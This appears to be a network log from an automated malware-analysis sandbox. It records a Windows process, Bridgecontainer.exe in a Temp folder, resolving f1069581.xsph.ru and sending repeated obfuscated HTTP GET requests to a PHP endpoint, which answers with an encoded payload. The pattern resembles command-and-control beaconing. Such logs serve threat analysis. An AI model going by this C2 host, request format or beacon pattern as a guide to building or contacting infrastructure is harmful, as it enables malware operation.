                Jan 2, 2025 05:18:27.514319897 CET4998780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:27.516639948 CET8049991141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:27.516714096 CET4999180192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:31.834419012 CET4999180192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:31.835221052 CET4999280192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:31.839303970 CET8049991141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:31.840044975 CET8049992141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:31.840128899 CET4999280192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:31.840255022 CET4999280192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:31.845052004 CET8049992141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:31.845175982 CET8049992141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:32.523602962 CET8049992141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:32.568279982 CET4999280192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.098392963 CET4975780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.098392963 CET4998780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.099611998 CET4999280192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.102401018 CET4999380192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.104667902 CET8049992141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:33.107255936 CET8049993141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:33.110532045 CET4999280192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.110537052 CET4999380192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.110641956 CET4999380192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.115403891 CET8049993141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:33.804224014 CET8049993141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:33.805701017 CET4999480192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.805702925 CET4999380192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.810616970 CET8049994141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:33.810807943 CET8049993141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:33.813453913 CET4999480192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.813460112 CET4999380192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.813539028 CET4999480192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:33.818331003 CET8049994141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:33.818489075 CET8049994141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:34.520953894 CET8049994141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:34.568286896 CET4999480192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:37.537672997 CET4999480192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:37.542406082 CET4999580192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:37.542917967 CET8049994141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:37.545677900 CET4999480192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:37.547221899 CET8049995141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:37.547410965 CET4999580192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:37.547410965 CET4999580192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:37.552215099 CET8049995141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:37.552373886 CET8049995141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:38.231367111 CET8049995141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:38.271409035 CET4999580192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:43.242418051 CET4999680192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:43.247472048 CET8049996141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:43.247692108 CET4999680192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:43.247786045 CET4999680192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:43.252676964 CET8049996141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:43.252687931 CET8049996141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:43.971126080 CET8049996141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:44.021537066 CET4999680192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:48.990896940 CET4999680192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:48.991708040 CET4999780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:48.996016979 CET8049996141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:48.996125937 CET4999680192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:48.996581078 CET8049997141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:48.996645927 CET4999780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:48.996751070 CET4999780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:49.001590967 CET8049997141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:49.001601934 CET8049997141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:49.680490017 CET8049997141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:49.880836964 CET4999780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:54.694226027 CET4999780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:54.695478916 CET4999880192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:54.699523926 CET8049997141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:54.699582100 CET4999780192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:54.700381994 CET8049998141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:54.700460911 CET4999880192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:54.700608015 CET4999880192.168.2.5141.8.192.151
                Jan 2, 2025 05:18:54.705375910 CET8049998141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:54.705503941 CET8049998141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:55.375226021 CET8049998141.8.192.151192.168.2.5
                Jan 2, 2025 05:18:55.429694891 CET4999880192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:00.382989883 CET4999880192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:00.385833025 CET4999980192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:00.388227940 CET8049998141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:00.388288975 CET4999880192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:00.390743017 CET8049999141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:00.390814066 CET4999980192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:00.390961885 CET4999980192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:00.395817041 CET8049999141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:00.395920038 CET8049999141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:01.070681095 CET8049999141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:01.148768902 CET4999980192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:06.084414005 CET4999980192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:06.085462093 CET5000080192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:06.089673042 CET8049999141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:06.090338945 CET8050000141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:06.090445995 CET5000080192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:06.090451956 CET4999980192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:06.090580940 CET5000080192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:06.095343113 CET8050000141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:06.095493078 CET8050000141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:06.764190912 CET8050000141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:06.819330931 CET5000080192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:08.269165039 CET8049995141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:08.269226074 CET4999580192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:11.772573948 CET5000080192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:11.777709961 CET8050000141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:11.777741909 CET5000180192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:11.778559923 CET5000080192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:11.782622099 CET8050001141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:11.782746077 CET5000180192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:11.782843113 CET5000180192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:11.787575006 CET8050001141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:11.787797928 CET8050001141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:12.467449903 CET8050001141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:12.532505035 CET5000180192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:17.475987911 CET5000180192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:17.475996017 CET5000280192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:17.480900049 CET8050002141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:17.481183052 CET8050001141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:17.482533932 CET5000180192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:17.482556105 CET5000280192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:17.482655048 CET5000280192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:17.487508059 CET8050002141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:17.487623930 CET8050002141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:18.167092085 CET8050002141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:18.302711964 CET5000280192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:23.178520918 CET5000280192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:23.182145119 CET5000380192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:23.183743954 CET8050002141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:23.187011957 CET8050003141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:23.187046051 CET5000280192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:23.188725948 CET5000380192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:23.188725948 CET5000380192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:23.193566084 CET8050003141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:23.193659067 CET8050003141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:23.864540100 CET8050003141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:23.944565058 CET5000380192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:28.667292118 CET8050003141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:28.667355061 CET5000380192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:28.870651007 CET5000380192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:28.871552944 CET5000480192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:28.875502110 CET8050003141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:28.876426935 CET8050004141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:28.876497984 CET5000480192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:28.876593113 CET5000480192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:28.881438971 CET8050004141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:28.881481886 CET8050004141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:29.556889057 CET8050004141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:29.646676064 CET5000480192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:34.568869114 CET5000480192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:34.569804907 CET5000580192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:34.574973106 CET8050004141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:34.575038910 CET5000480192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:34.575273037 CET8050005141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:34.575337887 CET5000580192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:34.575462103 CET5000580192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:34.580261946 CET8050005141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:34.580404997 CET8050005141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:35.258728027 CET8050005141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:35.304754972 CET5000580192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:40.272161961 CET5000580192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:40.273236036 CET5000680192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:40.277216911 CET8050005141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:40.277272940 CET5000580192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:40.278064013 CET8050006141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:40.278132915 CET5000680192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:40.278254986 CET5000680192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:40.283068895 CET8050006141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:40.283174038 CET8050006141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:40.994932890 CET8050006141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:41.037110090 CET5000680192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:46.008609056 CET5000780192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:46.008611917 CET5000680192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:46.013457060 CET8050007141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:46.013612986 CET8050006141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:46.016623974 CET5000780192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:46.016624928 CET5000680192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:46.020806074 CET5000780192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:46.025609970 CET8050007141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:46.025820971 CET8050007141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:46.698717117 CET8050007141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:46.740225077 CET5000780192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:51.713660002 CET5000780192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:51.716598988 CET5000880192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:51.719600916 CET8050007141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:51.720948935 CET5000780192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:51.723069906 CET8050008141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:51.724667072 CET5000880192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:51.728722095 CET5000880192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:51.735100985 CET8050008141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:51.735110044 CET8050008141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:52.417803049 CET8050008141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:52.458988905 CET5000880192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:57.428304911 CET5000880192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:57.429107904 CET5000980192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:57.433409929 CET8050008141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:57.433511972 CET5000880192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:57.433917999 CET8050009141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:57.436765909 CET5000980192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:57.436964989 CET5000980192.168.2.5141.8.192.151
                Jan 2, 2025 05:19:57.441792011 CET8050009141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:57.441880941 CET8050009141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:58.234035015 CET8050009141.8.192.151192.168.2.5
                Jan 2, 2025 05:19:58.287111998 CET5000980192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:03.241563082 CET5001080192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:03.246535063 CET8050010141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:03.246608019 CET5001080192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:03.246721029 CET5001080192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:03.251573086 CET8050010141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:03.251624107 CET8050010141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:03.934907913 CET8050010141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:04.052845955 CET5001080192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:08.944169998 CET5001080192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:08.944966078 CET5001180192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:08.951277971 CET8050010141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:08.951351881 CET5001080192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:08.951922894 CET8050011141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:08.951989889 CET5001180192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:08.952136040 CET5001180192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:08.959196091 CET8050011141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:08.959763050 CET8050011141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:09.626683950 CET8050011141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:09.626995087 CET5001180192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:09.632150888 CET8050011141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:09.634627104 CET5001180192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:14.632574081 CET5001280192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:14.637471914 CET8050012141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:14.637541056 CET5001280192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:14.637654066 CET5001280192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:14.642483950 CET8050012141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:14.642625093 CET8050012141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:15.312179089 CET8050012141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:15.368599892 CET5001280192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:20.321343899 CET5001280192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:20.322398901 CET5001380192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:20.327174902 CET8050012141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:20.327245951 CET5001280192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:20.327279091 CET8050013141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:20.327351093 CET5001380192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:20.328696966 CET5001380192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:20.333872080 CET8050013141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:20.333884954 CET8050013141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:21.045594931 CET8050013141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:21.102829933 CET5001380192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:26.053216934 CET5001380192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:26.056658983 CET5001480192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:26.058249950 CET8050013141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:26.060760975 CET5001380192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:26.061507940 CET8050014141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:26.064809084 CET5001480192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:26.064923048 CET5001480192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:26.069724083 CET8050014141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:26.069828987 CET8050014141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:26.739919901 CET8050014141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:26.880975962 CET5001480192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:28.241323948 CET8050009141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:28.244739056 CET5000980192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:31.756300926 CET5001480192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:31.757056952 CET5001580192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:31.761467934 CET8050014141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:31.761703014 CET5001480192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:31.761857033 CET8050015141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:31.762007952 CET5001580192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:31.762175083 CET5001580192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:31.766957045 CET8050015141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:31.767162085 CET8050015141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:32.641308069 CET8050015141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:32.693408012 CET5001580192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:33.321157932 CET8050015141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:33.321214914 CET5001580192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:37.647686958 CET5001680192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:37.647689104 CET5001580192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:37.652584076 CET8050015141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:37.652632952 CET8050016141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:37.653152943 CET5001680192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:37.653153896 CET5001680192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:37.658025980 CET8050016141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:37.658145905 CET8050016141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:38.330703974 CET8050016141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:38.380896091 CET5001680192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:43.334649086 CET5001680192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:43.335633993 CET5001780192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:43.339840889 CET8050016141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:43.339922905 CET5001680192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:43.340482950 CET8050017141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:43.340549946 CET5001780192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:43.340688944 CET5001780192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:43.345396042 CET8050017141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:43.345662117 CET8050017141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:44.018168926 CET8050017141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:44.068521023 CET5001780192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:49.022124052 CET5001780192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:49.023134947 CET5001880192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:49.027232885 CET8050017141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:49.027292013 CET5001780192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:49.027985096 CET8050018141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:49.028059959 CET5001880192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:49.028161049 CET5001880192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:49.032963991 CET8050018141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:49.033056974 CET8050018141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:49.704236031 CET8050018141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:49.756802082 CET5001880192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:54.709974051 CET5001880192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:54.711282015 CET5001980192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:54.715234041 CET8050018141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:54.715306997 CET5001880192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:54.716084957 CET8050019141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:54.716160059 CET5001980192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:54.717807055 CET5001980192.168.2.5141.8.192.151
                Jan 2, 2025 05:20:54.722625017 CET8050019141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:54.722749949 CET8050019141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:55.391807079 CET8050019141.8.192.151192.168.2.5
                Jan 2, 2025 05:20:55.443429947 CET5001980192.168.2.5141.8.192.151
                Jan 2, 2025 05:21:00.397105932 CET5001980192.168.2.5141.8.192.151
                Jan 2, 2025 05:21:00.398108959 CET5002080192.168.2.5141.8.192.151
                Jan 2, 2025 05:21:00.402496099 CET8050019141.8.192.151192.168.2.5
                Jan 2, 2025 05:21:00.402549028 CET5001980192.168.2.5141.8.192.151
                Jan 2, 2025 05:21:00.403453112 CET8050020141.8.192.151192.168.2.5
                Jan 2, 2025 05:21:00.403523922 CET5002080192.168.2.5141.8.192.151
                Jan 2, 2025 05:21:00.403615952 CET5002080192.168.2.5141.8.192.151
                Jan 2, 2025 05:21:00.408854008 CET8050020141.8.192.151192.168.2.5
                Jan 2, 2025 05:21:00.409409046 CET8050020141.8.192.151192.168.2.5
                Jan 2, 2025 05:21:01.080615997 CET8050020141.8.192.151192.168.2.5
                Jan 2, 2025 05:21:01.193423033 CET5002080192.168.2.5141.8.192.151
                TimestampSource PortDest PortSource IPDest IP
                Jan 2, 2025 05:17:05.174551964 CET5124153192.168.2.51.1.1.1
                Jan 2, 2025 05:17:05.214426994 CET53512411.1.1.1192.168.2.5
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jan 2, 2025 05:17:05.174551964 CET192.168.2.51.1.1.10x5486Standard query (0)f1069581.xsph.ruA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jan 2, 2025 05:17:05.214426994 CET1.1.1.1192.168.2.50x5486No error (0)f1069581.xsph.ru141.8.192.151A (IP address)IN (0x0001)false
                • f1069581.xsph.ru
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.549704141.8.192.151805688C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe
                TimestampBytes transferredDirectionData
                Jan 2, 2025 05:17:05.239795923 CET556OUTGET /L1nc0In.php?Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o&75bc118bb61e898f749f2e2d30ba883f=b10b73b68010ec981337a8b11094b01e&0ba6e725790744febcc21ebe8d80c3a7=ANwYTMjFGO0gTM0M2Y2YGM3Q2N3ITNzAzNwMjYwYTNiNGMyUzY2gjY&Wp30iIZTUgvkQQPKBHnOh6jhKT=K5TAxnDU&0kvCEE2IfmI1FZAXyMQ=FWqO4OYBg86M5o HTTP/1.1
                Accept: */*
                Content-Type: text/html
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                Host: f1069581.xsph.ru
                Connection: Keep-Alive
                Jan 2, 2025 05:17:06.085664988 CET1236INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 02 Jan 2025 04:17:05 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 2152
                Connection: keep-alive
                Vary: Accept-Encoding
                Data Raw: 39 4a 69 5a 30 49 54 4e 78 6b 54 5a 7a 4d 54 5a 6c 4a 47 5a 79 59 47 4f 34 63 6a 5a 33 55 47 5a 79 63 7a 4e 78 45 6d 59 30 63 6a 4d 6b 4a 69 4f 69 45 57 4e 7a 51 54 4d 7a 59 44 4e 6d 6c 44 5a 34 6b 54 4f 32 49 7a 4d 6a 46 6d 4d 7a 67 7a 4d 30 67 54 5a 35 49 57 5a 35 4d 47 4d 69 77 69 49 6d 46 31 62 33 39 55 61 4b 6c 6e 57 59 4a 56 65 61 68 6c 57 31 4a 47 4d 4f 56 54 57 79 55 44 62 6a 35 6d 53 78 6b 56 4d 35 55 58 59 58 52 57 4d 69 68 6b 51 32 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 72 6c 6b 61 76 6c 32 54 46 70 56 56 57 5a 56 4f 7a 4a 6d 4d 4b 52 58 5a 57 35 55 4e 5a 4a 54 4e 73 4e 6d 62 4b 46 54 57 78 6b 54 64 68 64 46 5a 78 49 47 53 43 5a 6e 57 58 4e 57 61 4a 4e 55 51 4c 78 30 51 4a 74 57 53 71 39 57 61 69 64 55 4f 70 4a 47 57 73 52 56 5a 58 35 55 64 61 68 6c 53 35 52 32 56 4f 5a 6d 59 74 78 6d 62 6b 64 46 65 33 4a 6d 4d 57 35 57 53 70 46 30 5a 44 6c 32 64 70 4a 6c 52 4f 5a 56 53 71 39 57 61 61 64 6c 55 32 46 31 4d 73 70 6d 59 74 5a 56 65 6a 35 6d 56 71 68 6c 4d 31 41 6e 57 7a 59 31 63 6a 64 [TRUNCATED]
